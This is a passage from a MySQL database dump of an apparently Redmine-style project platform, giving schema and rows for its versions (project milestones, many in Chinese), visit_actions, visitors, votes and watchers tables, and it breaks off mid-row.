KEY `versions_project_id` (`project_id`),
|
||
KEY `index_versions_on_sharing` (`sharing`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=29 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `versions`
|
||
--
|
||
|
||
LOCK TABLES `versions` WRITE;
|
||
/*!40000 ALTER TABLE `versions` DISABLE KEYS */;
|
||
INSERT INTO `versions` VALUES (2,100,'需求分析V1.0','项目初始化及需求分析','2019-02-05','2019-01-22 00:33:38','2019-01-22 00:36:36',NULL,'open','none',1,3,0,0),(3,101,'需求分析1.0','初始化代码及需求','2019-02-07','2019-01-22 09:12:03','2019-01-22 09:12:03',NULL,'open','none',1,1,0,0),(4,130,'Gazebo-exercise-0.2','第二个开发测试版本发布',NULL,'2019-05-24 14:01:11','2019-05-24 14:01:11',NULL,'locked','none',26,0,0,0),(6,131,'MileStone No.1','first milestone','2019-08-28','2019-08-17 17:08:53','2019-08-17 17:08:53',NULL,'open','none',54,0,0,0),(10,199,'Risk-V 2.0版本发布','Risk-V 2.0版本发布',NULL,'2019-11-07 16:28:43','2019-11-07 16:28:43',NULL,'open','none',49,6,0,0),(11,199,'Risk-V 1.0版本发布','1.0版本发布','2019-09-10','2019-11-08 11:20:04','2019-11-11 10:15:58',NULL,'closed','none',49,7,0,0),(12,199,'risk - 3','第三个测试版本',NULL,'2019-11-11 10:01:16','2019-11-11 10:01:16',NULL,'open','none',49,0,0,0),(13,199,'risk -4','',NULL,'2019-11-11 17:17:23','2019-11-11 17:17:23',NULL,'open','none',49,0,0,0),(14,199,'a','','2019-06-30','2019-11-22 16:19:40','2019-11-22 16:19:40',NULL,'open','none',46,0,0,0),(15,199,'b','',NULL,'2019-11-22 16:20:31','2019-11-22 16:22:00',NULL,'closed','none',46,0,0,0),(16,199,'kfc','',NULL,'2019-11-22 16:32:03','2019-11-22 16:32:03',NULL,'open','none',46,0,0,0),(17,251,'里程碑1:30架飞机+1辆车混合编队进行区域覆盖','第一个里程碑,完成跨域的混合编队,使用区域覆盖验证是否完成任务','2020-04-01','2020-02-04 22:03:53','2020-02-05 10:35:34',NULL,'open','none',76,0,0,0),(18,251,'尹桂信建立里程碑(测试使用)','测试使用','2020-02-06','2020-02-05 09:52:42','2020-02-05 09:52:42',NULL,'locked','none',79,0,0,0),(19,251,'尹桂信建立里程碑2(测试使用)','测试使用','2020-02-07','2020-02-05 09:53:44','2020-02-05 10:34:37',NULL,'locked','none',79,0,0,0),(20,251,'里程碑4:发布micROS-v1.0-beta3','年终发布新版本1.0-beta3','2020-12-31','2020-02-05 15:23:52','2020-02-05 15:23:52',NULL,'open','none',76,0,0,0),(21,255,'详细设计','主要是通过调研、研讨,初步完成课题的详细设计方案','2020-03-10','2020-02-10 16:35:26','2020-02-10 16:35:26',NULL,'open','none',77,28,0,0),(22,251,'Roadmap test','Roadmap test','2020-04-30','2020-04-14 14:15:39','2020-04-14 14:15:39',NULL,'open','none',80,0,0,0),(23,370,'0815测试基线','测试基线','2020-08-15','2020-08-14 03:02:53','2020-08-14 03:02:53','','open','',46,1,0,0),(24,268,'dasdfa','asdfasdf',NULL,'2020-08-17 10:47:38','2020-08-17 10:47:38','','open','',47,0,0,0),(26,473,'里程碑01','里程碑01','2021-01-31','2021-01-22 08:21:00','2021-01-22 08:21:00','','open','',155,1,0,0),(27,473,'里程碑001','里程碑001','2021-01-26','2021-01-25 06:02:37','2021-01-25 06:02:37','','open','',155,0,0,0),(28,494,'test1','11',NULL,'2021-02-22 08:32:12','2021-02-22 08:32:12','','open','',49,2,0,0);
|
||
/*!40000 ALTER TABLE `versions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `visit_actions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `visit_actions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `visit_actions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`visitable_id` int(11) DEFAULT NULL,
|
||
`visitable_type` varchar(255) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_visit_actions_on_visitable_id_and_user_id` (`visitable_id`,`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=289 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `visit_actions`
|
||
--
|
||
|
||
LOCK TABLES `visit_actions` WRITE;
|
||
/*!40000 ALTER TABLE `visit_actions` DISABLE KEYS */;
|
||
INSERT INTO `visit_actions` VALUES (1,240,'Memo',2,'2020-01-03 17:28:26','2021-03-05 17:02:29'),(2,183,'Memo',2,'2020-01-03 17:32:28','2021-03-15 17:28:08'),(6,183,'Memo',49,'2020-01-10 14:48:13','2020-01-10 14:48:13'),(10,183,'Memo',46,'2020-01-17 16:28:27','2020-09-08 16:21:48'),(12,167,'Memo',2,'2020-01-17 16:40:46','2021-03-16 14:23:41'),(13,183,'Memo',76,'2020-02-01 23:23:21','2020-02-01 23:29:59'),(47,143,'Memo',2,'2020-07-22 19:16:23','2021-02-27 09:55:40'),(52,143,'Memo',111,'2020-07-28 11:59:48','2020-08-10 18:19:47'),(58,168,'Memo',2,'2020-08-06 16:49:34','2021-03-16 14:03:59'),(74,176,'Memo',1,'2020-08-10 14:36:19','2020-08-20 15:12:59'),(77,183,'Memo',111,'2020-08-10 16:23:37','2020-10-22 13:50:25'),(78,176,'Memo',111,'2020-08-10 16:38:16','2020-08-17 17:53:49'),(79,177,'Memo',111,'2020-08-10 16:38:49','2020-08-14 18:25:15'),(80,167,'Memo',111,'2020-08-10 16:47:29','2020-08-10 16:47:29'),(82,180,'Memo',111,'2020-08-10 18:06:29','2020-08-18 10:35:05'),(83,168,'Memo',111,'2020-08-10 18:06:35','2020-08-10 18:06:35'),(84,123,'Memo',111,'2020-08-10 18:07:20','2020-08-10 18:07:20'),(92,180,'Memo',2,'2020-08-12 10:40:33','2021-02-02 09:26:44'),(114,180,'Memo',112,'2020-08-17 16:23:50','2020-08-17 16:36:22'),(115,183,'Memo',112,'2020-08-17 16:27:12','2020-08-17 16:35:30'),(116,183,'Memo',114,'2020-08-17 16:29:10','2020-08-18 09:01:34'),(118,168,'Memo',112,'2020-08-17 16:48:38','2020-08-17 16:48:38'),(120,337,'Memo',1,'2020-08-18 08:57:03','2020-08-21 08:47:29'),(121,240,'Memo',114,'2020-08-18 08:59:47','2020-08-18 08:59:57'),(123,233,'Memo',1,'2020-08-18 09:12:27','2020-10-13 14:13:54'),(125,240,'Memo',1,'2020-08-18 09:18:54','2021-03-11 09:43:22'),(126,183,'Memo',73,'2020-08-18 09:23:00','2020-08-18 09:23:41'),(127,240,'Memo',112,'2020-08-18 09:23:08','2020-08-18 09:23:08'),(131,241,'Memo',1,'2020-08-18 11:54:51','2020-09-08 17:28:56'),(132,241,'Memo',111,'2020-08-18 14:06:50','2020-09-11 09:15:04'),(133,232,'Memo',111,'2020-08-18 14:09:25','2020-09-18 14:44:46'),(134,239,'Memo',111,'2020-08-18 14:10:46','2020-08-18 14:10:46'),(135,230,'Memo',111,'2020-08-18 14:11:04','2020-10-15 19:08:03'),(136,240,'Memo',111,'2020-08-18 14:11:45','2020-10-14 17:15:29'),(137,240,'Memo',47,'2020-08-18 18:27:43','2020-08-28 10:21:14'),(138,183,'Memo',47,'2020-08-18 18:29:14','2020-08-20 15:49:58'),(139,241,'Memo',2,'2020-08-19 08:32:41','2021-02-27 09:52:58'),(143,233,'Memo',111,'2020-08-19 09:14:27','2020-08-19 09:14:27'),(145,236,'Memo',47,'2020-08-19 09:43:35','2020-08-19 09:43:35'),(151,232,'Memo',47,'2020-08-20 14:33:35','2020-08-21 11:24:12'),(152,234,'Memo',47,'2020-08-20 14:34:09','2020-08-20 14:34:09'),(154,241,'Memo',47,'2020-08-20 15:35:49','2020-08-26 09:31:21'),(155,4,'Memo',47,'2020-08-20 15:53:42','2020-08-27 14:02:16'),(157,2,'Memo',47,'2020-08-20 17:22:18','2020-08-25 18:33:33'),(158,230,'Memo',1,'2020-08-21 08:16:07','2020-08-21 08:48:07'),(159,236,'Memo',1,'2020-08-21 08:16:14','2020-08-21 08:16:14'),(169,337,'Memo',2,'2020-08-21 08:46:52','2021-03-09 19:37:12'),(170,232,'Memo',1,'2020-08-21 08:58:13','2021-03-11 09:43:27'),(171,4,'Memo',111,'2020-08-21 09:45:19','2020-10-12 09:41:44'),(172,232,'Memo',49,'2020-08-21 10:10:07','2020-10-16 16:31:58'),(173,232,'Memo',73,'2020-08-21 10:11:25','2020-08-21 10:11:25'),(174,337,'Memo',47,'2020-08-21 10:35:09','2020-08-21 10:35:14'),(175,232,'Memo',2,'2020-08-21 11:24:23','2021-03-07 05:09:47'),(176,346,'Memo',2,'2020-08-21 11:28:11','2020-08-21 14:27:53'),(177,4,'Memo',2,'2020-08-21 14:27:42','2021-03-14 14:59:23'),(178,2,'Memo',46,'2020-08-24 08:53:22','2020-12-17 10:28:48'),(179,4,'Memo',46,'2020-08-24 08:53:36','2020-09-23 08:54:19'),(180,21,'Memo',46,'2020-08-24 08:56:40','2020-10-19 17:18:55'),(181,167,'Memo',46,'2020-08-24 08:58:45','2020-08-24 08:58:45'),(182,22,'Memo',46,'2020-08-24 09:06:39','2020-08-24 09:06:39'),(183,241,'Memo',46,'2020-08-24 09:35:02','2020-09-08 16:16:00'),(184,2,'Memo',2,'2020-08-24 15:13:22','2021-03-16 09:44:59'),(185,2,'Memo',66,'2020-08-24 15:14:55','2020-10-15 08:23:15'),(186,2,'Memo',63,'2020-08-24 15:24:20','2020-10-16 08:04:28'),(187,235,'Memo',46,'2020-08-24 15:34:13','2020-08-24 15:34:13'),(188,230,'Memo',46,'2020-08-24 15:34:53','2020-08-24 15:43:17'),(191,2,'Memo',111,'2020-08-24 17:47:38','2020-09-24 16:30:59'),(192,233,'Memo',47,'2020-08-25 11:20:28','2020-08-25 11:20:28'),(194,239,'Memo',47,'2020-08-25 13:47:49','2020-08-25 14:00:49'),(195,21,'Memo',47,'2020-08-25 13:58:16','2020-08-27 16:21:22'),(196,235,'Memo',47,'2020-08-25 13:58:28','2020-08-25 13:58:28'),(197,168,'Memo',47,'2020-08-25 14:01:54','2020-08-25 18:34:04'),(198,230,'Memo',47,'2020-08-25 14:06:46','2020-08-25 14:10:05'),(199,343,'Memo',46,'2020-08-25 15:57:24','2020-08-25 15:57:24'),(200,240,'Memo',46,'2020-08-25 15:57:58','2021-01-11 14:53:55'),(201,232,'Memo',46,'2020-08-25 16:00:29','2020-12-17 10:27:30'),(202,337,'Memo',46,'2020-08-25 16:03:01','2020-08-25 16:03:01'),(204,230,'Memo',2,'2020-08-25 17:34:31','2021-03-16 09:41:14'),(205,343,'Memo',2,'2020-08-25 18:22:07','2021-02-02 10:14:55'),(206,240,'Memo',63,'2020-08-26 10:25:13','2020-09-21 09:40:15'),(207,343,'Memo',48,'2020-08-26 17:19:44','2020-08-26 17:19:44'),(208,21,'Memo',111,'2020-08-26 18:22:42','2020-10-15 19:17:32'),(210,337,'Memo',111,'2020-08-27 17:59:00','2020-10-15 19:07:54'),(212,97,'Memo',111,'2020-08-27 18:02:25','2020-08-27 18:02:25'),(213,240,'Memo',115,'2020-09-03 08:28:04','2020-09-03 08:28:04'),(214,343,'Memo',111,'2020-09-07 09:34:24','2020-10-15 19:13:20'),(215,235,'Memo',2,'2020-09-10 09:12:25','2021-02-03 22:42:46'),(216,236,'Memo',2,'2020-09-10 09:12:26','2021-03-16 05:40:38'),(217,234,'Memo',2,'2020-09-10 09:12:56','2021-03-16 12:31:43'),(218,239,'Memo',2,'2020-09-10 10:21:54','2021-03-16 10:41:46'),(220,233,'Memo',2,'2020-09-14 12:45:19','2021-03-02 19:34:30'),(221,21,'Memo',48,'2020-09-14 18:33:20','2020-12-09 17:36:25'),(222,4,'Memo',113,'2020-09-15 08:26:47','2020-09-15 08:26:47'),(223,21,'Memo',63,'2020-09-15 08:29:41','2020-09-15 08:29:41'),(226,2,'Memo',113,'2020-09-15 09:31:05','2020-09-15 09:31:05'),(227,240,'Memo',48,'2020-09-15 16:05:33','2020-12-09 17:36:42'),(228,241,'Memo',113,'2020-09-15 16:24:05','2020-09-15 16:24:05'),(229,240,'Memo',113,'2020-09-15 16:24:33','2020-09-15 16:24:33'),(230,343,'Memo',63,'2020-09-15 16:29:21','2020-09-15 16:29:21'),(231,21,'Memo',2,'2020-09-17 15:07:06','2021-03-16 04:49:02'),(232,2,'Memo',115,'2020-09-18 08:30:13','2020-09-18 08:30:13'),(233,21,'Memo',115,'2020-09-18 08:30:41','2020-09-18 08:30:41'),(235,2,'Memo',55,'2020-09-18 09:28:20','2020-09-18 09:28:20'),(238,97,'Memo',66,'2020-09-23 14:38:30','2020-09-23 14:38:30'),(239,22,'Memo',2,'2020-09-29 15:39:01','2021-03-16 09:35:01'),(240,4,'Memo',115,'2020-10-09 09:27:34','2020-10-09 09:27:34'),(241,236,'Memo',111,'2020-10-12 10:17:32','2020-10-12 10:17:32'),(242,21,'Memo',66,'2020-10-12 11:35:20','2020-10-12 11:35:20'),(243,21,'Memo',55,'2020-10-12 12:47:55','2020-10-12 12:47:55'),(244,232,'Memo',48,'2020-10-14 17:31:31','2020-12-09 17:36:31'),(245,235,'Memo',111,'2020-10-15 19:13:29','2020-10-15 19:13:29'),(246,21,'Memo',49,'2020-10-16 16:22:29','2020-10-19 11:21:59'),(247,240,'Memo',49,'2020-10-19 11:21:48','2020-10-19 11:21:48'),(248,21,'Memo',118,'2020-12-01 18:20:18','2020-12-01 18:20:18'),(249,343,'Memo',118,'2020-12-01 18:24:25','2020-12-01 18:24:25'),(250,235,'Memo',48,'2020-12-09 17:36:37','2020-12-09 17:36:37'),(251,21,'Memo',121,'2020-12-16 17:39:57','2020-12-16 17:39:57'),(252,337,'Memo',122,'2020-12-16 19:01:19','2020-12-16 19:01:19'),(253,21,'Memo',127,'2020-12-22 19:49:48','2020-12-22 19:49:48'),(254,21,'Memo',131,'2020-12-29 11:50:19','2020-12-29 11:50:19'),(255,239,'Memo',149,'2021-01-06 15:48:45','2021-01-06 15:48:45'),(256,232,'Memo',149,'2021-01-06 15:48:53','2021-01-06 15:48:53'),(258,21,'Memo',119,'2021-01-18 12:11:46','2021-01-27 22:22:09'),(259,232,'Memo',119,'2021-01-18 12:12:09','2021-01-27 22:22:18'),(260,21,'Memo',129,'2021-01-18 15:03:53','2021-01-18 15:03:53'),(262,21,'Memo',50,'2021-01-19 11:02:24','2021-01-19 11:02:24'),(265,2,'Memo',119,'2021-01-22 10:43:20','2021-01-22 10:43:20'),(268,239,'Memo',1,'2021-01-29 09:49:31','2021-01-29 09:49:42'),(269,176,'Memo',2,'2021-02-02 03:58:46','2021-02-19 06:45:50'),(270,97,'Memo',2,'2021-02-02 04:24:12','2021-03-16 14:13:50'),(271,123,'Memo',2,'2021-02-02 06:57:57','2021-02-02 06:57:57'),(272,177,'Memo',2,'2021-02-02 09:36:49','2021-02-27 12:32:22'),(273,160,'Memo',2,'2021-02-02 10:23:59','2021-02-02 10:23:59'),(274,240,'Memo',119,'2021-02-02 12:13:33','2021-02-02 12:13:33'),(275,241,'Memo',55,'2021-02-18 11:07:12','2021-02-18 11:33:16'),(276,240,'Memo',165,'2021-02-20 09:47:18','2021-02-20 09:47:18'),(277,240,'Memo',137,'2021-02-22 19:34:41','2021-02-22 19:34:41'),(278,2,'Memo',49,'2021-02-24 10:32:11','2021-02-24 10:32:13'),(279,343,'Memo',49,'2021-02-24 10:33:26','2021-02-24 10:33:26'),(280,241,'Memo',49,'2021-02-24 10:34:04','2021-02-24 10:34:04'),(281,123,'Memo',49,'2021-02-24 10:34:28','2021-02-24 10:34:28'),(282,241,'Memo',178,'2021-02-24 16:30:48','2021-02-24 16:30:48'),(283,233,'Memo',178,'2021-02-24 16:31:32','2021-02-24 16:31:32'),(284,337,'Memo',178,'2021-02-24 16:31:37','2021-02-24 16:31:37'),(285,232,'Memo',193,'2021-03-04 10:25:28','2021-03-04 10:25:28'),(286,21,'Memo',175,'2021-03-04 10:50:07','2021-03-04 10:50:07'),(287,241,'Memo',215,'2021-03-09 22:03:29','2021-03-09 22:03:29'),(288,241,'Memo',217,'2021-03-11 07:20:57','2021-03-11 07:20:57');
|
||
/*!40000 ALTER TABLE `visit_actions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `visitors`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `visitors`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `visitors` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`master_id` int(11) DEFAULT NULL,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_visitors_user_id` (`user_id`),
|
||
KEY `index_visitors_master_id` (`master_id`),
|
||
KEY `index_visitors_updated_on` (`updated_on`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=117 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `visitors`
|
||
--
|
||
|
||
LOCK TABLES `visitors` WRITE;
|
||
/*!40000 ALTER TABLE `visitors` DISABLE KEYS */;
|
||
INSERT INTO `visitors` VALUES (1,4,1,'2018-07-11 10:31:40','2018-07-08 10:34:57'),(2,1,4,'2018-07-10 17:00:27','2018-07-10 17:00:27'),(3,5,1,'2018-08-10 09:26:09','2018-07-20 10:19:57'),(4,1,5,'2020-03-20 08:08:42','2018-08-02 22:57:13'),(5,1,6,'2018-08-03 15:16:17','2018-08-03 10:15:06'),(6,1,11,'2018-08-22 15:32:15','2018-08-22 15:32:15'),(7,11,1,'2018-08-22 16:30:24','2018-08-22 16:30:24'),(8,1,10,'2018-09-09 14:37:27','2018-09-09 14:37:27'),(9,1,9,'2018-11-14 15:28:43','2018-11-14 15:27:33'),(10,1,17,'2018-11-14 15:28:14','2018-11-14 15:28:14'),(11,9,1,'2018-11-14 15:32:07','2018-11-14 15:31:53'),(12,1,12,'2018-11-22 20:24:01','2018-11-22 20:22:42'),(13,19,1,'2019-01-17 20:11:15','2019-01-17 20:11:15'),(14,1,22,'2019-02-23 18:37:55','2019-02-23 18:37:55'),(15,22,26,'2019-03-04 19:23:43','2019-03-04 19:23:43'),(16,32,31,'2019-03-22 16:15:44','2019-03-22 16:15:44'),(17,26,43,'2019-04-17 10:03:07','2019-04-17 10:03:07'),(18,46,49,'2019-11-25 09:24:08','2019-08-08 08:44:11'),(19,49,46,'2019-11-25 17:15:47','2019-08-08 11:28:28'),(20,49,20,'2019-10-08 15:42:23','2019-08-08 15:20:55'),(21,49,50,'2019-11-25 16:14:59','2019-08-08 15:38:55'),(22,50,52,'2019-09-19 16:09:44','2019-08-09 16:11:23'),(23,50,23,'2019-10-08 14:00:30','2019-08-09 16:11:26'),(24,46,52,'2019-08-12 10:57:40','2019-08-12 10:57:26'),(25,46,23,'2019-08-12 10:57:35','2019-08-12 10:57:35'),(26,49,53,'2019-08-13 10:09:39','2019-08-13 10:09:39'),(27,50,46,'2019-11-11 09:09:53','2019-08-13 17:13:50'),(28,50,49,'2019-12-30 10:18:32','2019-08-13 17:19:45'),(29,46,53,'2019-08-14 08:10:53','2019-08-14 08:10:46'),(30,50,53,'2019-08-14 10:11:00','2019-08-14 10:10:53'),(31,50,47,'2019-08-14 10:11:16','2019-08-14 10:11:16'),(32,54,46,'2019-08-19 15:30:35','2019-08-19 15:30:35'),(33,20,50,'2019-10-08 10:39:10','2019-08-24 15:46:04'),(34,50,56,'2019-10-08 11:17:20','2019-10-08 11:17:20'),(35,50,20,'2019-10-08 17:35:59','2019-10-08 11:17:49'),(36,49,37,'2019-10-08 15:42:23','2019-10-08 13:55:05'),(37,49,26,'2019-10-14 17:06:19','2019-10-14 17:06:19'),(38,59,56,'2019-10-23 09:36:39','2019-10-23 09:36:39'),(39,46,26,'2019-10-23 10:50:46','2019-10-23 10:50:46'),(40,58,49,'2019-10-24 17:03:11','2019-10-24 17:03:11'),(41,49,1,'2019-10-25 08:55:50','2019-10-25 08:55:50'),(42,61,50,'2019-10-29 18:03:43','2019-10-29 18:03:43'),(43,50,59,'2019-11-01 10:58:34','2019-11-01 10:58:34'),(44,50,68,'2019-11-01 11:00:14','2019-11-01 11:00:14'),(45,50,51,'2019-11-01 15:52:26','2019-11-01 15:52:26'),(46,26,46,'2019-11-03 12:10:31','2019-11-03 12:10:18'),(47,50,26,'2019-11-04 16:02:16','2019-11-04 16:02:16'),(48,46,59,'2019-11-06 09:39:31','2019-11-06 09:39:31'),(49,46,61,'2019-11-06 09:42:51','2019-11-06 09:40:00'),(50,49,56,'2019-11-07 09:25:00','2019-11-07 09:25:00'),(51,50,1,'2019-11-08 10:39:09','2019-11-08 10:39:09'),(52,65,46,'2019-11-08 10:52:45','2019-11-08 10:52:45'),(53,50,65,'2019-11-08 11:09:26','2019-11-08 11:09:26'),(54,64,71,'2019-11-11 15:14:51','2019-11-11 15:14:51'),(55,46,64,'2019-11-22 09:47:59','2019-11-22 09:47:59'),(56,49,23,'2019-11-24 15:04:24','2019-11-24 15:04:24'),(57,50,71,'2019-11-24 20:42:24','2019-11-24 20:42:24'),(58,49,41,'2019-11-25 09:20:31','2019-11-25 09:20:31'),(59,49,52,'2019-11-25 17:15:53','2019-11-25 17:15:53'),(60,76,75,'2020-03-25 11:08:23','2020-02-01 21:10:25'),(61,75,76,'2020-02-01 22:38:52','2020-02-01 22:38:21'),(62,76,79,'2020-02-04 22:48:27','2020-02-04 22:06:13'),(63,80,75,'2020-02-04 22:24:40','2020-02-04 22:21:24'),(64,79,75,'2020-02-04 22:40:28','2020-02-04 22:22:24'),(65,79,80,'2020-02-04 22:51:39','2020-02-04 22:51:32'),(66,75,79,'2020-02-05 10:37:59','2020-02-05 10:37:59'),(67,81,49,'2020-02-05 10:42:04','2020-02-05 10:41:48'),(68,76,80,'2020-02-05 11:08:34','2020-02-05 11:08:34'),(69,76,77,'2020-02-14 14:44:38','2020-02-05 11:44:12'),(70,76,85,'2020-02-10 10:14:49','2020-02-10 10:14:49'),(71,76,82,'2020-02-10 10:25:54','2020-02-10 10:25:54'),(72,83,77,'2020-02-11 09:01:01','2020-02-11 09:01:01'),(73,92,77,'2020-02-11 10:27:47','2020-02-11 10:27:32'),(74,91,77,'2020-02-11 10:38:55','2020-02-11 10:38:11'),(75,86,77,'2020-02-11 10:44:15','2020-02-11 10:44:04'),(76,81,77,'2020-02-11 11:20:27','2020-02-11 11:20:21'),(77,89,77,'2020-02-11 11:35:10','2020-02-11 11:27:54'),(78,99,77,'2020-02-13 08:23:41','2020-02-11 12:56:02'),(79,90,64,'2020-02-11 17:15:20','2020-02-11 17:15:20'),(80,82,77,'2020-02-11 20:11:30','2020-02-11 17:56:06'),(81,96,77,'2020-02-21 16:28:39','2020-02-11 21:45:55'),(82,84,75,'2020-02-12 09:30:44','2020-02-12 09:30:26'),(83,1,76,'2020-06-16 16:04:36','2020-02-13 09:01:05'),(84,1,73,'2020-02-13 09:03:53','2020-02-13 09:03:53'),(85,94,77,'2020-02-14 12:07:47','2020-02-14 12:07:40'),(86,76,83,'2020-03-19 13:58:06','2020-02-25 22:48:29'),(87,73,3,'2020-03-18 16:17:18','2020-03-18 16:17:18'),(88,1,3,'2020-03-18 16:21:15','2020-03-18 16:21:15'),(89,49,6,'2020-03-18 16:29:56','2020-03-18 16:29:42'),(90,107,76,'2020-03-19 15:15:27','2020-03-19 15:15:27'),(91,76,105,'2020-03-19 15:22:59','2020-03-19 15:22:14'),(92,46,76,'2020-03-19 15:35:04','2020-03-19 15:35:04'),(93,1,56,'2020-03-19 15:48:23','2020-03-19 15:48:23'),(94,1,63,'2020-03-19 15:49:32','2020-03-19 15:49:32'),(95,1,61,'2020-03-19 15:49:48','2020-03-19 15:49:48'),(96,46,99,'2020-03-19 16:26:32','2020-03-19 16:26:32'),(97,46,81,'2020-03-19 16:30:51','2020-03-19 16:30:51'),(98,1,83,'2020-03-19 17:25:16','2020-03-19 17:25:16'),(99,1,49,'2020-08-18 09:07:01','2020-03-23 09:18:42'),(100,1,46,'2020-10-14 17:07:31','2020-03-23 09:23:02'),(101,1,90,'2020-03-23 16:31:37','2020-03-23 16:25:53'),(102,1,55,'2020-04-02 09:41:43','2020-04-02 09:41:43'),(103,1,45,'2020-04-03 09:30:48','2020-04-03 09:30:48'),(104,49,45,'2020-04-09 10:26:36','2020-04-09 10:26:25'),(105,48,1,'2020-07-06 14:38:59','2020-07-06 14:38:59'),(106,48,49,'2020-07-06 14:39:06','2020-07-06 14:39:06'),(107,111,1,'2020-08-17 15:10:04','2020-07-06 14:41:18'),(108,111,76,'2020-07-06 15:36:45','2020-07-06 15:36:45'),(109,111,75,'2020-07-08 15:02:48','2020-07-06 16:03:27'),(110,111,46,'2020-07-30 14:45:23','2020-07-08 19:22:11'),(111,55,52,'2020-08-12 10:25:34','2020-08-12 10:25:31'),(112,111,49,'2020-08-12 13:44:57','2020-08-12 13:44:57'),(113,66,46,'2020-08-14 14:56:11','2020-08-14 14:56:11'),(114,46,114,'2020-08-14 16:43:32','2020-08-14 16:43:32'),(115,66,1,'2020-09-09 10:52:56','2020-09-09 10:52:56'),(116,1,47,'2020-10-15 09:45:23','2020-10-15 09:44:34');
|
||
/*!40000 ALTER TABLE `visitors` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `votes`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `votes`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `votes` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `votes`
|
||
--
|
||
|
||
LOCK TABLES `votes` WRITE;
|
||
/*!40000 ALTER TABLE `votes` DISABLE KEYS */;
|
||
INSERT INTO `votes` VALUES (3,49,15,'Paper','2019-10-08 08:59:11','2019-10-08 08:59:11'),(4,49,64,'Paper','2019-10-27 14:17:49','2019-10-27 14:17:49'),(12,49,62,'Paper','2019-10-27 14:18:12','2019-10-27 14:18:12'),(15,49,63,'Paper','2019-10-27 14:20:13','2019-10-27 14:20:13');
|
||
/*!40000 ALTER TABLE `votes` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `watchers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `watchers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `watchers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`watchable_type` varchar(255) NOT NULL DEFAULT '',
|
||
`watchable_id` int(11) NOT NULL DEFAULT '0',
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `watchers_user_id_type` (`user_id`,`watchable_type`),
|
||
KEY `index_watchers_on_user_id` (`user_id`),
|
||
KEY `index_watchers_on_watchable_id_and_watchable_type` (`watchable_id`,`watchable_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=113 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `watchers`
|
||
--
|
||
|
||
LOCK TABLES `watchers` WRITE;
|
||
/*!40000 ALTER TABLE `watchers` DISABLE KEYS */;
|
||
INSERT INTO `watchers` VALUES (1,'Memo',1,1,NULL),(2,'Memo',2,1,NULL),(3,'Memo',3,1,NULL),(4,'Memo',4,1,NULL),(5,'Memo',5,1,NULL),(6,'Memo',6,1,NULL),(7,'Memo',7,1,NULL),(8,'Memo',8,1,NULL),(9,'Memo',9,1,NULL),(11,'Memo',11,1,NULL),(12,'Memo',12,1,NULL),(13,'Memo',13,1,NULL),(14,'Memo',14,1,NULL),(15,'Memo',15,1,NULL),(16,'Memo',16,1,NULL),(17,'Memo',17,1,NULL),(18,'Memo',18,1,NULL),(19,'Memo',19,1,NULL),(20,'Memo',20,1,NULL),(21,'Memo',21,1,NULL),(22,'Memo',22,1,NULL),(24,'Principal',1,5,NULL),(27,'Principal',50,49,NULL),(28,'Principal',53,50,NULL),(29,'Principal',75,76,'2020-02-01 22:36:19'),(32,'Memo',183,76,'2020-02-01 23:29:59'),(33,'Principal',75,79,'2020-02-04 22:26:14'),(34,'Principal',79,76,'2020-02-04 22:48:24'),(35,'Principal',80,79,'2020-02-04 22:51:34'),(36,'Principal',76,79,'2020-02-04 22:57:04'),(37,'Principal',77,99,'2020-02-11 12:56:21'),(38,'Principal',77,82,'2020-02-11 17:56:10'),(43,'Principal',1,111,'2020-07-07 